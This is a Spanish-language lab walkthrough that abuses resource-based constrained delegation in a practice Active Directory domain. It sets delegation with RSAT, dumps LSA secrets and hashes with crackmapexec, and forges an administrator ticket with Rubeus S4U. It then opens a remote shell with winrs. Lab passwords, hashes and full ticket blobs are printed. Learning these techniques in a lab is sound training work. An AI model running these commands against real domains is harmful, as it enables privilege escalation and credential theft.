Learning Objective - 17

Resource-based Constrained Delegation (RBCD)

Para abusar de la RBCD de la forma más eficaz, sólo necesitamos dos privilegios.

Permisos de escritura sobre el servicio u objeto de destino para configurar msDSAllowedToActOnBehalfOfOtherIdentity.
Control sobre un objeto que tiene SPN configurado (como acceso admin a una maquina unida a un dominio o la habilidad de unir una maquina a un dominio - ms-DSMachineAccountQuota es 10 para todos los usuarios del dominio)

Por los laboratorios anteriores, sabes que tenemos acceso al usuario CIADMIN, asi que enumeramos sus permisos.

dcorp\ciadmin:*ContinuousIntrusion123

Mediante RSAT vamos a configurar el RBCD.

PS C:\AD\Tools\ADModule-master\ActiveDirectory> $comps = 'dcorp-std723$'
PS C:\AD\Tools\ADModule-master\ActiveDirectory> Set-ADComputer -Identity dcorp-mgmt -PrincipalsAllowedToDelegateToAccount $comps
PS C:\AD\Tools\ADModule-master\ActiveDirectory>

Ahora extraeremos el hash AES del nuestro usuario estudiante.

crackmapexec smb 172.16.100.23 -u 'student723' -p 'hT3qDFRHGzVpJtym' --lsa
SMB         172.16.100.23   445    DCORP-STD723     [*] Windows 10.0 Build 20348 x64 (name:DCORP-STD723) (domain:dollarcorp.moneycorp.local) (signing:False) (SMBv1:False)
SMB         172.16.100.23   445    DCORP-STD723     [+] dollarcorp.moneycorp.local\student723:hT3qDFRHGzVpJtym (Pwn3d!)
SMB         172.16.100.23   445    DCORP-STD723     [+] Dumping LSA secrets
SMB         172.16.100.23   445    DCORP-STD723     DOLLARCORP.MONEYCORP.LOCAL/student723:$DCC2$10240#student723#eb5f214b28ad3157316b015e0ceb0dde
SMB         172.16.100.23   445    DCORP-STD723     DOLLARCORP.MONEYCORP.LOCAL/ciadmin:$DCC2$10240#ciadmin#3999881514643dbc5cd4efcdce983215
SMB         172.16.100.23   445    DCORP-STD723     DOLLARCORP.MONEYCORP.LOCAL/svcadmin:$DCC2$10240#svcadmin#80dcb7982483a2ee1aaa9ef2da703179
SMB         172.16.100.23   445    DCORP-STD723     DOLLARCORP.MONEYCORP.LOCAL/websvc:$DCC2$10240#websvc#5100e73bf7f60de365fe1e39d21070c9
SMB         172.16.100.23   445    DCORP-STD723     DOLLARCORP.MONEYCORP.LOCAL/appadmin:$DCC2$10240#appadmin#8bb559da7ec65410afbd8c561b37f5b5
SMB         172.16.100.23   445    DCORP-STD723     dcorp\DCORP-STD723$:aes256-cts-hmac-sha1-96:8af99cbdd43c481488c733f0c0d54263a82d986c4477b7ed3e1a4c331fb2e595
SMB         172.16.100.23   445    DCORP-STD723     dcorp\DCORP-STD723$:aes128-cts-hmac-sha1-96:df30e9661d9fdbec4812b51673713729
SMB         172.16.100.23   445    DCORP-STD723     dcorp\DCORP-STD723$:des-cbc-md5:bf10e370e064101c
SMB         172.16.100.23   445    DCORP-STD723     dcorp\DCORP-STD723$:plain_password_hex:3c004300200059006e0020007900340038004e0057005900420031006c00440049004e00340043005e00220044003e005b0031003f00270037005f0020003a0051007700440042004a004300500059006c005f002b00600064003e002800720044007700360023007000270066002d006f0037003c0039005200710043005400790071006a007100520078005e0057002f00210040003700440024002a002c003b007600620063003e004f005400610058004700420058006d007100260030002f002f004300770044006d00600029002400290071006d005c0073004d003100580068004b0032006400730036002000
SMB         172.16.100.23   445    DCORP-STD723     dcorp\DCORP-STD723$:aad3b435b51404eeaad3b435b51404ee:b7e5761232035582a44230df3247d401:::
SMB         172.16.100.23   445    DCORP-STD723     dpapi_machinekey:0xababb32297aa7249ddae9c0653a6a1017e71b9a4
dpapi_userkey:0xf06a4a31213cab5931ec2c976ab3de2ec6297136
SMB         172.16.100.23   445    DCORP-STD723     NL$KM:2155a8f764dd9afa80950f03e8e4765e11349956de62e100c6fd7db814af4f7358c168e316e2049893a539c61b7ae419fee6efdc7364728cf92af25c68d2db73
SMB         172.16.100.23   445    DCORP-STD723     [+] Dumped 12 LSA secrets to /home/dsds/.cme/logs/DCORP-STD723_172.16.100.23_2024-03-03_192256.secrets and /home/dsds/.cme/logs/DCORP-STD723_172.16.100.23_2024-03-03_192256.cached

Luego, ejecutamos el rubeus.

PS C:\AD\Tools> .\Rubeus.exe s4u /user:dcorp-std723$ /aes256:8af99cbdd43c481488c733f0c0d54263a82d986c4477b7ed3e1a4c331fb2e595 /msdsspn:http/dcorp-mgmt /impersonateuser:administrator /ptt

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.1

[*] Action: S4U

[*] Using aes256_cts_hmac_sha1 hash: 8af99cbdd43c481488c733f0c0d54263a82d986c4477b7ed3e1a4c331fb2e595
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\dcorp-std723$'
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      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
      LmxvY2Fs


[*] Action: S4U

[*] Building S4U2self request for: '[email protected]'
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Sending S4U2self request to 172.16.2.1:88
[+] S4U2self success!
[*] Got a TGS for 'administrator' to '[email protected]'
[*] base64(ticket.kirbi):

      doIGVzCCBlOgAwIBBaEDAgEWooIFQTCCBT1hggU5MIIFNaADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlD
      T1JQLkxPQ0FMohowGKADAgEBoREwDxsNZGNvcnAtc3RkNzIzJKOCBPIwggTuoAMCARKhAwIBAqKCBOAE
      ggTcDiZfokRZXbTLQ0fLEDWhAlUDzf03O1ajhZ+rfUueWrQENaGiTBfWw+ahfflX/QKr94QR/djouKeP
      vhODBGL5R33bbqjy88wmt1P7p3kzrxeuFy006IE5X2ESWzu8witIC8j0pufBEukR5IP6O5HExsqAyR+J
      NVyNpIOJ2n4fVpP/+ugpZ4Hy4VHCr4RtTBlj3Xx4gDo+j6+FLN1Xxs8nwHmgqdrZETIkmMr9FqxuqgR7
      2GcUi+4IYIL3ORATYcrE/JH8vN5nVqbkfr5rx0Ec4yZ0fVkwIb14qeDKQgtZQvhDEIPA7r0jZ139/X5U
      g4sJd6TihD83u6jJaKKsQ8p1lj5qjHv1VIIMomXqCMaq4Xdp3Qhm4iUfTUCmjrUSpLob/csPt+jhZVn5
      dbvGvfu5A5uObsC8U+n12RLXoXS3+aIXAuvK+W4gMXBRxe0Xhk/yd+ijHshWaeoTyTL1XWBYc3fIvtDL
      RpsQfw95B/njfhfU3GIRQIkhdJokStSyuHjJ1lwy+uJNEUJMYiqI/UwdyXLVbdl8v83hvG9fZqa0+bvM
      EDtWgZkQ6fZokHOSZR99N2ORUr5JspVyNd4n8LKcuFBpAy3Wn6gfkuvdxp4/1MtAcCg4Hg+0C6YKxMSY
      q3eGJX9d5KFKlmAaRz1JGbYMGFn/XLuMljw3Tbs/qj0V5WS6MJRUzVg24np3gaSo/Zaz70m3mgmxlKwg
      ap+CJdjdwmlNHpo5UcXDQ1brTqYXVh5u198cHTJ3nsdfDqh6R/KUNweeT/4+sMSTPB2ElJVxbhbJ0iRL
      d8gRIkl6vTrVTUNpZNt+xJ7ny85hrWV+kBUihUcRUE9UCPoy4YpFkiF6mBDVdbEjqilNsR2fxfxYHyKN
      p/79XlwSMAaTiTP0qwlvUQBNWnb7qiMg66fBahUDgNTNiv4ze+lPb5z5CjcSAXfxWo/gCYdUegmrprUL
      qLZ0Ep4K8kpGPfW61xKXLKauAA4aOxd5LiL43rJfFsK/TbxAgEKCpWIozctsH7lf3OCOYbjmxcA7JpkC
      yQ+ck+5K84m9WCEywCK/+Ls6BcFSCIXFIvq6IOeC9Ut/nUSP/etxMK9sImzCr/XlzrZ+NzrfoHySCbDe
      1ieXMv8FGjeGn+mWna21sgVMnuMPnPJUUm+IlQebn4cwyUDUnyYyet91AUBP+yYDK5pNz7/oAfpdzii0
      FfYJuIYI6+lXlwlX5flPdpGUzWXQWw+aQNkhI0WVSAts0BLF8UQX6rtVmXgDS/NGVnSQAqkl7fiXgsnF
      PtrPsBw7uqNY5ew0fJhFYIRHoGSSD3oLurpUK/v8vmkMtVTyDYu+tjjrr1IdOYFgD3yVGs3YWT18jOtM
      tawK9fuK6EtBDsUlPcW9MUKiZm7/qKWd6oG6JaUHwbDP+SGmOFbOZQ8U9GMan/cuT6SWNjo4u+bdZ8e5
      eRdthk8SQx36www1qeeS+cQshqQCKoGHH1SfxK/wX71ZnCH7P/3AefMb3tUZ56AF0XRfp2Fw6s1aQIp/
      yT+Mnc0KDaUOelpzkvFP/zdkRAIdCo2peUEGPUVeag2ZdHx4g4i9INk+o9xWvCj3YvhkfAXhR96IlzbY
      XcPSltaqSDp51sbNIdVVgSojEB5lAUgj4e7iyVaUQ27/w3yjexd6DWIEryIQotKjggEAMIH9oAMCAQCi
      gfUEgfJ9ge8wgeyggekwgeYwgeOgKzApoAMCARKhIgQgHf7JuTYsspE7T5GSSRrC/6QbI546r5+nL4sA
      uW6vxgWhHBsaRE9MTEFSQ09SUC5NT05FWUNPUlAuTE9DQUyiGjAYoAMCAQqhETAPGw1hZG1pbmlzdHJh
      dG9yowcDBQBAoQAApREYDzIwMjQwMzA0MDA0MDE1WqYRGA8yMDI0MDMwNDEwNDAxNVqnERgPMjAyNDAz
      MTEwMDQwMTVaqBwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMqRowGKADAgEBoREwDxsNZGNvcnAt
      c3RkNzIzJA==

[*] Impersonating user 'administrator' to target SPN 'http/dcorp-mgmt'
[*] Building S4U2proxy request for service: 'http/dcorp-mgmt'
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Sending S4U2proxy request to domain controller 172.16.2.1:88
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'http/dcorp-mgmt':

      doIHBDCCBwCgAwIBBaEDAgEWooIF/DCCBfhhggX0MIIF8KADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlD
      T1JQLkxPQ0FMoh0wG6ADAgECoRQwEhsEaHR0cBsKZGNvcnAtbWdtdKOCBaowggWmoAMCARKhAwIBAaKC
      BZgEggWUvzMFfAGSEAcM5Hd2pSaGJ5bzAP3/0u9GZZNLYqrM0Z4eVjJynrbxc8rvgFc8fWY+Fy6PsqQJ
      vDUEFqoO6x1zi+F9+o4rdoEvRJ3GpiODLzqpgRRbuvTJVS+naj3Y642AHS2ZF5cpSm3PFXdhqZdVZHvE
      ZtA/PVUthZxhH2ni570Ba7s5EvaIXWT8vLeFXI0p0Qkcd5rZQkJDHl84BCuMHgv7mkZNozjdUcudzZ7T
      CzjF2Aa1dtGbm7CzVYHvJUHl0SW0fDj6pZM5nT7RsjKbuUy13UY7ZME59D22XIkKUwCY+Jwif+AUuP6m
      rSzv0w9bGaMqsjtvo+cpZ3T4UK52ZvSvQcJd4+vT2BUW75aeW9MDcqsVdYlJRflu+O3KxSNnvLYeH5U7
      QA1GsW0KbBYbbA3rVQX1T22SNK7HjlsXjv8CUW2SjfbNy2Qyrg62HMedc2OMyagLWnHI80o3V/hmxRPF
      n28nqyohv/u/SCcouEU842jQPMky0W+O/1LZ1D/nIPfGKF+kw6Hmn824es066bn/M7U9uxYwJr1VbsgW
      hVTr1Ofv4092g64TT/i/m2H/rqDmZA1bJKqDRleBVcCbQT1+auR8jc8xMexRv78DpLsIveAH3rYKxwSq
      Ki5XY/WrJpKSDBi0AAhQ36nD5j+MOnlKqRzbX+tQ/F8d/TXuQgSv+/R4Tvb4P7IUYsNsFUcX//fpOE0q
      StofwYWMXKvbmWLcF8xIUbzhlKML80FVFfWviTAdxKBjeo4vonIHu4/ARNrC8BZHK/l2KlzvRFpd1KhL
      XcTcSYOQISRWBcQvmryV+vAOIPVMk9j7KUPwsR0fjSEoC6elDYh61d7qPWoRCrzqSjmVGkIp4vp5SrFm
      X0l6BFuF61LTjWOBJPOcYYNmO/dekJcxCjHsPq3AY5uYg4e0jNtSzgWOX/msCfu6o92tB+PRKGCIkt4Z
      u4FIvbGlMlEifB4HSDJrYcj/0M9qj9+OZ6EUSbkyzJRxUqoXBWMRuOwCmSU1ADgNybSb/OLiVLsoYnWg
      ueEsQx7sa+aLNXLljodsrSzIhL8gWa1MrC/QM/jLPuuwwPdzJ/KTiiHTy8k+zWdKSdmHa3lZdcu8g01R
      Mc0WR/1cvNNKDzYyBkQyS7tIvGb64uOO8bydwBm5Pn8ZWoWEAptGWijHQnl63IGm2mOebOJ3mac2Qoxd
      gi7SybmtTjbHt/vlW/mg4YrFVJ1r8Gj2mcJL6JokZk3OF/B94Xv2Bgj/TgQqdI7WGnXURWSCu6th8cHB
      hdMPJTZMhd+4cRl8WyhBSmH9qiT/86zlgxkF6Rfa6ejccgwRCK40f11wJOqB0Q0ZvTCmj4eS2HbVIGBu
      3WjvsF/FcgENSXCLJ1JOk8EPQDLnst60MzoP/eNTVcAUnzeEdCamte+1/2BbcO3BFonX0owc08xjJz+g
      y17qNpWkvT95c5Wt1LXsSOr5D0yJ5VGwZxXKx7JbwHwgGgelEjWFR11WH/ni2wN77DK4XK9yCIySHJUa
      JO1C9TPIz2Vu+LVREjpKwDZDfABzceaOV4eAKKHrc+wzx3CSFc29Uf18gmW5vqNHcDh6wk7sxw1Mcj1B
      /A5Lks7wIwKZbVHzrf6ILiMlPUhCOI1nHKjx3eAL0Qsy7jTJbSrPkwUPaA8t8LgE6XOpQ0jhRGOCJOc6
      DMBeS+56PVa6fCcIBMdiRmNiqW3Q4aQJ+krPTXi0vat+YCV7OnyH3v6NuqKuy7kFPCWqMUBqS1lFUhH8
      CVHlV5c1r6D3qWwRcCCxYfDK5b9vuQnJRh27INOOdYAduwLxJ+H9j94UHAiRnMQMteOF4DLQ+SgPvYir
      BRCKrcIS6P6Da/J/Xfn0v8QGm0eYwxvrwVRXSxjUWDSwwvm3Gb6AKGSiOb+Elurzj1+/AwGdo4HzMIHw
      oAMCAQCigegEgeV9geIwgd+ggdwwgdkwgdagGzAZoAMCARGhEgQQ2hbTLg9AUyNNoalpYtGNf6EcGxpE
      T0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKIaMBigAwIBCqERMA8bDWFkbWluaXN0cmF0b3KjBwMFAECh
      AAClERgPMjAyNDAzMDQwMDQwMTVaphEYDzIwMjQwMzA0MTA0MDE1WqcRGA8yMDI0MDMxMTAwNDAxNVqo
      HBsaRE9MTEFSQ09SUC5NT05FWUNPUlAuTE9DQUypHTAboAMCAQKhFDASGwRodHRwGwpkY29ycC1tZ210
[+] Ticket successfully imported!
PS C:\AD\Tools> klist

Current LogonId is 0:0xe922452

Cached Tickets: (1)

#0>     Client: administrator @ DOLLARCORP.MONEYCORP.LOCAL
        Server: http/dcorp-mgmt @ DOLLARCORP.MONEYCORP.LOCAL
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize
        Start Time: 3/3/2024 16:40:15 (local)
        End Time:   3/4/2024 2:40:15 (local)
        Renew Time: 3/10/2024 16:40:15 (local)
        Session Key Type: AES-128-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called:

Luego de esto, con el ticket cargado, iniciamos una cmd remota con winrs.

PS C:\AD\Tools> winrs -r:dcorp-mgmt cmd.exe
Microsoft Windows [Version 10.0.20348.2227]
(c) Microsoft Corporation. All rights reserved.

C:\Users\Administrator.dcorp>hostname
hostname
dcorp-mgmt

C:\Users\Administrator.dcorp>whoami
whoami
dcorp\administrator

Conclusion:

Explotar RBCD te permite obtener RCE en un objeto al cual solo contabas con permisos GenericWrite.

PreviousLearning Objective - 16 NextLearning Objective - 18

Last updated 1 year ago